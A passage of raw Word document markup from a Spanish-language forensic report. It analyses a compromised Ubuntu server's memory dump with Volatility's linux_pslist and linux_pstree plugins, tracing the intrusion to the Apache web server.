YAywb&#10;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JXiEuLEDAABQCAAA&#10;DgAAAAAAAAAAAAAAAAA6AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAKAAAAAAAAACEArqlUufIJAgDy&#10;CQIAFAAAAAAAAAAAAAAAAAAXBgAAZHJzL21lZGlhL2ltYWdlMS5wbmdQSwECLQAUAAYACAAAACEA&#10;WcOikd8AAAAHAQAADwAAAAAAAAAAAAAAAAA7EAIAZHJzL2Rvd25yZXYueG1sUEsBAi0AFAAGAAgA&#10;AAAhAKomDr68AAAAIQEAABkAAAAAAAAAAAAAAAAARxECAGRycy9fcmVscy9lMm9Eb2MueG1sLnJl&#10;bHNQSwUGAAAAAAYABgB8AQAAOhICAAAA&#10;">
                <v:shape id="Imagen 14" o:spid="_x0000_s1118" type="#_x0000_t75" alt="Captura de pantalla de computadora&#10;&#10;Descripción generada automáticamente" style="position:absolute;width:40944;height:1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ExwAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9fS8Mw&#10;EH8X9h3CDXxzyTYrtS4boyIU96KbH+BszrasudQkrvXbG0Hw8X7/b7ObbC8u5EPnWMNyoUAQ1850&#10;3Gh4Oz3d5CBCRDbYOyYN3xRgt51dbbAwbuRXuhxjI1IIhwI1tDEOhZShbsliWLiBOHEfzluM6fSN&#10;NB7HFG57uVLqTlrsODW0OFDZUn0+flkNn6arypfTbaneD77K7x9Xz+PBan09n/YPICJN8V/8565M&#10;mr/M1muV5XkGvz8lAOT2BwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAKIX78THAAAA4wAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;">
                  <v:imagedata r:id="rId162" o:title="Captura de pantalla de computadora&#10;&#10;Descripción generada automáticamente"/>
                </v:shape>
                <v:shape id="_x0000_s1119" type="#_x0000_t202" style="position:absolute;left:41662;top:2305;width:12319;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rRhywAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9PS8Mw&#10;GMbvgt8hvIIXcalbqVtdNsZQUC/DbpfdXpp3TbV5U5J0q9/eHIQdH55//Jbr0XbiTD60jhU8TTIQ&#10;xLXTLTcKDvu3xzmIEJE1do5JwS8FWK9ub5ZYanfhLzpXsRFphEOJCkyMfSllqA1ZDBPXEyfv5LzF&#10;mKRvpPZ4SeO2k9MsK6TFltODwZ62huqfarAKdvlxZx6G0+vnJp/5j8OwLb6bSqn7u3HzAiLSGK/h&#10;//a7VpAvZtP54rlIEAkp4YBc/QEAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAA&#10;AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAA&#10;ABUBAAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQC8UrRhywAA&#10;AOIAAAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/wIA&#10;AAAA&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="22BC80C2" w14:textId="5A6C6B26" w:rsidR="0099494B" w:rsidRPr="005D1386" w:rsidRDefault="0099494B" w:rsidP="0099494B">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                            <w:noProof/>
                            <w:color w:val="FF0000"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>31</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="83" w:name="_Toc155782598"/>
                        <w:r w:rsidR="00EA137B">
                          <w:t>E</w:t>
                        </w:r>
                        <w:r>
                          <w:t xml:space="preserve">xtracto de </w:t>
                        </w:r>
                        <w:r w:rsidR="00EA137B">
                          <w:t>c</w:t>
                        </w:r>
                        <w:r>
                          <w:t>omando linux_pslist.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="83"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB188AE" w14:textId="16400DB2" w:rsidR="00084B0B" w:rsidRPr="00084B0B" w:rsidRDefault="00084B0B" w:rsidP="00084B0B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00084B0B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[Anexo </w:t>
      </w:r>
      <w:r w:rsidRPr="00084B0B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00084B0B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155719740 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00084B0B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00084B0B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>XV. Comando linux_pslist.</w:t>
      </w:r>
      <w:r w:rsidRPr="00084B0B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00084B0B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F77EF43" w14:textId="6E755235" w:rsidR="000C4414" w:rsidRPr="000C4414" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Una conclusión muy clara es que estos datos corroboran dos cosas, las fechas de linux_bash y los datos proporcionados por memmap con los mismos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5584A34D" w14:textId="422657F4" w:rsidR="000C4414" w:rsidRPr="00571AFA" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Ya en memmap teníamos conocimiento de 11 procesos </w:t>
      </w:r>
      <w:r w:rsidRPr="00571AFA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00571AFA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00571AFA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00571AFA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Apache: Software de servidor web de código abierto ampliamente utilizado."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00571AFA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00571AFA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00571AFA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Se puede declarar que el primer síntoma de anomalía en el sistema es en la ejecución de kworker/0:0 con P</w:t>
      </w:r>
      <w:r w:rsidR="006B2234" w:rsidRPr="00571AFA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00571AFA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">d 19056 siento la hora el </w:t>
      </w:r>
      <w:r w:rsidRPr="00571AFA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3 de enero de 2019 a las 4:24:46 UTC</w:t>
      </w:r>
      <w:r w:rsidRPr="00571AFA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CFD13B" w14:textId="613C5A18" w:rsidR="000C4414" w:rsidRPr="00571AFA" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00571AFA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Se procede a empezar a pintar la </w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00571AFA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>línea</w:t>
      </w:r>
      <w:r w:rsidRPr="00571AFA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> del tiempo. uniendo cronológicamente tanto </w:t>
      </w:r>
      <w:r w:rsidRPr="00571AFA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>linux_bash</w:t>
      </w:r>
      <w:r w:rsidRPr="00571AFA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> como </w:t>
      </w:r>
      <w:r w:rsidRPr="00571AFA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>linux_pslist</w:t>
      </w:r>
      <w:r w:rsidRPr="00571AFA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1870B3" w14:textId="123CB737" w:rsidR="000C4414" w:rsidRPr="000C4414" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00571AFA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3. Se llega a la conclusión de que el ataque verdaderamente ha venido por el servidor Apache</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00571AFA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00571AFA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00571AFA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Apache: Software de servidor web de código abierto ampliamente utilizado."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00571AFA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00571AFA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00571AFA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> y no por un servidor SQL ya que las aplicaciones de MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00571AFA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00571AFA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00571AFA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>MySQL: Sistema de gestión de bases de datos relacional de código abierto."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00571AFA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00571AFA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00571AFA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> estuvieron sin ser modificada. Eso no descarta que, al tener el acceso a las tablas sin necesidad </w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>de privilegios, provoque un error en el sistema y una vulnerabilidad en la entrada no deseada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA0C3E9" w14:textId="7C9B1194" w:rsidR="000C4414" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:t>Linux_pstree.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E96CEE" w14:textId="20208107" w:rsidR="00F21A91" w:rsidRPr="00F674A8" w:rsidRDefault="00F21A91" w:rsidP="00F21A91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F674A8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="000E1874">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="000E1874">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155739861 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="000E1874">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="000E1874">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Referencia XIX.</w:t>
      </w:r>
      <w:r w:rsidRPr="000E1874">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00F674A8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774E3882" w14:textId="2C1CAFDB" w:rsidR="000C4414" w:rsidRPr="000C4414" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">En la sección anterior, hemos procedido a buscar todos los procesos activos, ahora procederemos a ver si hay relación entre ellos. Para ello ejecutaremos </w:t>
      </w:r>
      <w:r w:rsidRPr="00426FF1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>linux_pstree</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Con este comando, se obtiene una estructura jerárquica que ilustra cómo los procesos están interconectados, incluyendo detalles como el identificador del proceso (PID), el nombre del proceso y los procesos hijos asociados. Esta visión jerárquica es esencial para entender la organización y la dinámica de los procesos en el sistema en el momento de la captura de la memoria. Es especialmente útil para identificar patrones anómalos o sospechosos, como procesos maliciosos que pueden estar ocultos o disfrazados bajo procesos legítimos. </w:t>
      </w:r>
      <w:r w:rsidR="001A130A" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>El comando por utilizar</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> es </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC4C11">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sudo python2.7 vol.py --profile=LinuxlinuxUbuntu_4_15_0-1021-aws_profilex64 -f '/home/jrodg85/Server_RAM</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>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ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00EC4C11">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.mem' linux_pstree</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDAD229" w14:textId="7836F39C" w:rsidR="000C4414" w:rsidRDefault="00BD1378" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251875328" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6F2C9690" wp14:editId="5E9036EF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>327964</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5397684" cy="1127760"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="1203538454" name="Grupo 28"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
